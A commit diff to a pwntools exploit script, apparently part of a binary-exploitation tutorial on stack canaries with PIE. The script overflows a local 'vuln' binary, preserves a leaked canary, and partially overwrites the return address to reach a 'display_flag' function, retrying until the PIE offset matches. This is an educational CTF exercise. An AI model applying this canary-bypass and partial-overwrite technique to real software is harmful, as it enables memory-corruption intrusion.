simplified code

Adamkadaban · Nov 28, 2022 · 0a0f37d · 0a0f37d
1 parent 58f87b1
commit 0a0f37d
Showing 1 changed file with 43 additions and 32 deletions.
diff --git a/7.Canary/2.Fake_Canary_With_PIE/finalExploit.py b/7.Canary/2.Fake_Canary_With_PIE/finalExploit.py
@@ -38,40 +38,51 @@ def exploit(canary):
 	e = ELF('./vuln')
 
 	flagOut = b""
-	while(flagOut == b""):
-		for i in range(0x10):
-			p = process('./vuln')
-
-			payload = b"A"*canaryOffset
-			payload += canary
-			payload += b"B"*retOffset
 
-			'''
-			- Here, instead of completely overwriting the address, 
-			  we only overwrite the last 2 bytes, as they are the
-			  only things that differ between the addresses of main
-			  and display_flag
-			- The below line of code builds the last 2 bytes of the
-			  address based on the idea that we only have to bruteforce
-			  the 4th nibble. 
-
-			'''
-			addressOfWin = p16(int(hex(e.sym['display_flag'] % 0x1000 + 0x1000*i)[2:].zfill(4), 16))
-			payload += addressOfWin
-
-			p.recvuntil(b"> ")
-			p.sendline(str.encode(str(len(payload))))
-
-			p.recvuntil(b"> ")
-			p.send(payload)
-
-			p.recvuntil(b"Flag?\n")
-
-			try:
-				flagOut = p.recv()
-			except:
-				print(f'Try {i:02}: Failed')
+	bruteForcedNibble = 0x0 # this is an arbitrary number chosen that is between 0x0 and 0xf
+							# assuming the bruteforced nibble is completely random, this choice should be just as good as any others
+							# we end up not using this, as the nibble we get from `display_flag` will occasionally be correct
+	n = 0
 
+	while(flagOut == b""):
+		p = process('./vuln')
+
+		payload = b"A"*canaryOffset
+		payload += canary
+		payload += b"B"*retOffset
+
+		'''
+		- Here, instead of completely overwriting the address, 
+		  we only overwrite the last 2 bytes, as they are the
+		  only things that differ between the addresses of main
+		  and display_flag
+		- The below line of code builds the last 2 bytes of the
+		  address based on the idea that we only have to bruteforce
+		  the 4th nibble. 
+
+		'''
+		# addressOfWin = p16(int(hex(e.sym['display_flag'] % 0x1000 + 0x1000*bruteForcedNibble)[2:].zfill(4), 16))
+		'''
+		because the 2 least significant bytes of the `display_flag` address will occasionally be fully correct,
+		we do not have to manipulate the address as have above. 
+		'''
+
+		addressOfWin = p16(e.sym['display_flag'] % 0x1000)
+		payload += addressOfWin
+
+		p.recvuntil(b"> ")
+		p.sendline(str.encode(str(len(payload))))
+
+		p.recvuntil(b"> ")
+		p.send(payload)
+
+		p.recvuntil(b"Flag?\n")
+
+		try:
+			flagOut = p.recv()
+		except:
+			print(f'Try {n + 1}: Failed')
+			n += 1
 			p.close()
 	return flagOut.rstrip().decode('UTF-8')